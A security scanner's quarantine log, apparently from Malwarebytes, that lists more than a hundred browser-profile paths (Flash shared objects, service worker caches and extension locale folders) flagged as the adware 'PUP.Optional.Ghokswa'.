    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82\fc38bb06-7f57-4e4e-8c8a-fb0bdc4a33e8, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\015659d1-ea9b-439e-acf5-779362b9cead, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.cdn-net.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.ajaxcdn.org, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\cdn2.dashbida.com\prod\vpaid2-dbfp.swf, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.iqiyi.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com\support\flashplayer\sys, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#s.ytimg.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82\3593b4ef-0c51-40e7-9f05-9756beebe440\index-dir, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\34724bf4-619a-4b24-b8a2-1f57864c5eb1\index-dir, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#irs01.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com\support\flashplayer, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\cdncache-a.akamaihd.net\items\e6a00\storage.swf, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\spotxchange-a.akamaihd.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\34724bf4-619a-4b24-b8a2-1f57864c5eb1, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82\3593b4ef-0c51-40e7-9f05-9756beebe440, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\www.ajaxcdn.org\swf.swf, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\cdn2.dashbida.com\prod, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com\support, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\cdnk.stickyadstv.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\cdncache-a.akamaihd.net\items\e6a00, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\scontent.lrcdn.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\cdn2.dashbida.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\www.ajaxcdn.org, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\cdncache-a.akamaihd.net\items, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\aa.online-metrix.net\fpc.swf, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\s.ytimg.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.ajaxcdn.org\swf.swf, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\cdncache-a.akamaihd.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.tripadvisor.com.my, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.paypalobjects.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.cdn-net.com\s.swf, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\static1-ssl.dmcdn.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\aa.online-metrix.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\CacheWritableAdobeRoot\AssetCache\ARP6T7MF, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es_419, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\qsf.is.quoracdn.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\player.letvcdn.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\static1.dmcdn.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es_419, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ro, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\th, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ru, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\tr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\uk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\vi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\bg, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ca, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\cs, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\en_US, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\es_419, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\da, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\de, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\el, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\es_419, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\et, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\es_419, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hu, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\id, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\it, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ja, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ko, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lt, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nb, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\es_419, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.cdn-net.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.ajaxcdn.org, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\zh_HK, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\en_US, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\fr_CA, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\cloud_route_details, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\en_US, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
